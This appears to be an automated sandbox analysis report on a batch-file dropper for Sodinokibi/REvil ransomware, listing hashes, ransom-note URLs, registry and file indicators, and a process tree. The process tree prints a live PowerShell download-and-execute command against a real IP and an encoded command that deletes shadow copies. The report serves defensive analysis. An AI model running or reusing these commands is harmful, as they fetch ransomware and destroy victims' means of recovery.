Analysis
- max time kernel: 34s
- max time network: 52s
- platform: windows7_x64
- resource: win7v200430
- submitted: 20-05-2020 23:10
Static task: static1
Behavioral task: behavioral1
- Sample: a1ced45242d2149282fc0a7230280012.bat
- Resource: win7v200430
Behavioral task: behavioral2
- Sample: a1ced45242d2149282fc0a7230280012.bat
- Resource: win10v200430
General
- Target: a1ced45242d2149282fc0a7230280012.bat
- Size: 217B
- MD5: 41b00aedcf17cecfbeb6362ce3bcd14f
- SHA1: c18a004d285abadf2b5840c9bb31c5cb9ae3a80c
- SHA256: 33347fdae792b3a0eb66bd0476b6ddcfb4aa1334e8a0de8a7f0aa8b2d07daa50
- SHA512: 1f0c5e210b4485ba274345201f4e5e5a5c30e5d217a347835ff2e759a8522f322d7428d33b9a529ad134930f9d65ccf642f8c84be93dc8cca8aeac40061ec455
Malware Config
Extracted (URL)
- http://185.103.242.78/pastes/a1ced45242d2149282fc0a7230280012
Extracted (ransom note: C:\qyn76iw4-readme.txt)
- sodinokibi
- http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/364473B984C95D99
- http://decryptor.cc/364473B984C95D99
Signatures
- Modifies service (2 TTPs, 4 IoCs)
  Processes: vssvc.exe
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
- Drops file in Program Files directory (17 IoCs)
  Processes: powershell.exe
  description | ioc | process
  File created | \??\c:\program files (x86)\qyn76iw4-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\CopyMove.dib | powershell.exe
  File created | \??\c:\program files\microsoft sql server compact edition\qyn76iw4-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\StartEdit.php | powershell.exe
  File created | \??\c:\program files\qyn76iw4-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\ConvertStep.wpl | powershell.exe
  File opened for modification | \??\c:\program files\MeasureCompare.rtf | powershell.exe
  File opened for modification | \??\c:\program files\UninstallUnblock.wmv | powershell.exe
  File created | \??\c:\program files\microsoft sql server compact edition\v3.5\qyn76iw4-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\BackupDisconnect.wmx | powershell.exe
  File opened for modification | \??\c:\program files\ExportConfirm.vst | powershell.exe
  File opened for modification | \??\c:\program files\FindUninstall.midi | powershell.exe
  File opened for modification | \??\c:\program files\PingSuspend.docx | powershell.exe
  File opened for modification | \??\c:\program files\SendSubmit.tif | powershell.exe
  File created | \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\qyn76iw4-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\RedoRegister.mpeg | powershell.exe
  File opened for modification | \??\c:\program files\UninstallPop.vsdm | powershell.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  Processes: powershell.exe
  pid | process
  1396 | powershell.exe
- Suspicious use of WriteProcessMemory (5 IoCs)
  Processes: cmd.exe, powershell.exe
  description | pid | process | target process
  PID 1304 wrote to memory of 1396 | 1304 | cmd.exe | powershell.exe
  PID 1396 wrote to memory of 1608 | 1396 | powershell.exe | powershell.exe
  PID 1396 wrote to memory of 1608 | 1396 | powershell.exe | powershell.exe
  PID 1396 wrote to memory of 1608 | 1396 | powershell.exe | powershell.exe
  PID 1396 wrote to memory of 1608 | 1396 | powershell.exe | powershell.exe
- Suspicious behavior: EnumeratesProcesses (77 IoCs)
  Processes: powershell.exe, powershell.exe
  pid | process
  77 entries in total: two entries for 1608 | powershell.exe, the remainder 1396 | powershell.exe
- Blacklisted process makes network request (1 IoC)
  Processes: powershell.exe
  flow | pid | process
  2 | 1396 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes: powershell.exe, powershell.exe, vssvc.exe
  description | pid | process
  Token: SeDebugPrivilege | 1396 | powershell.exe
  Token: SeDebugPrivilege | 1396 | powershell.exe
  Token: SeDebugPrivilege | 1608 | powershell.exe
  Token: SeBackupPrivilege | 524 | vssvc.exe
  Token: SeRestorePrivilege | 524 | vssvc.exe
  Token: SeAuditPrivilege | 524 | vssvc.exe
  Token: SeTakeOwnershipPrivilege | 1396 | powershell.exe
- Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
- Enumerates connected drives (3 TTPs)
- Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Processes: powershell.exe
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\lxdh05b344.bmp" | powershell.exe
Processes
- C:\Windows\system32\cmd.exe (PID 1304)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\a1ced45242d2149282fc0a7230280012.bat"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1396, child of 1304)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/a1ced45242d2149282fc0a7230280012');Invoke-KZMZWDCRYF;Start-Sleep -s 10000"
    - Drops file in Program Files directory
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of WriteProcessMemory
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - Suspicious use of AdjustPrivilegeToken
    - Sets desktop wallpaper using registry
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1608, child of 1396)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is base64-encoded UTF-16LE; it decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} — deletion of volume shadow copies, which accounts for the vssvc.exe activity below)
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\vssvc.exe (PID 524)
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken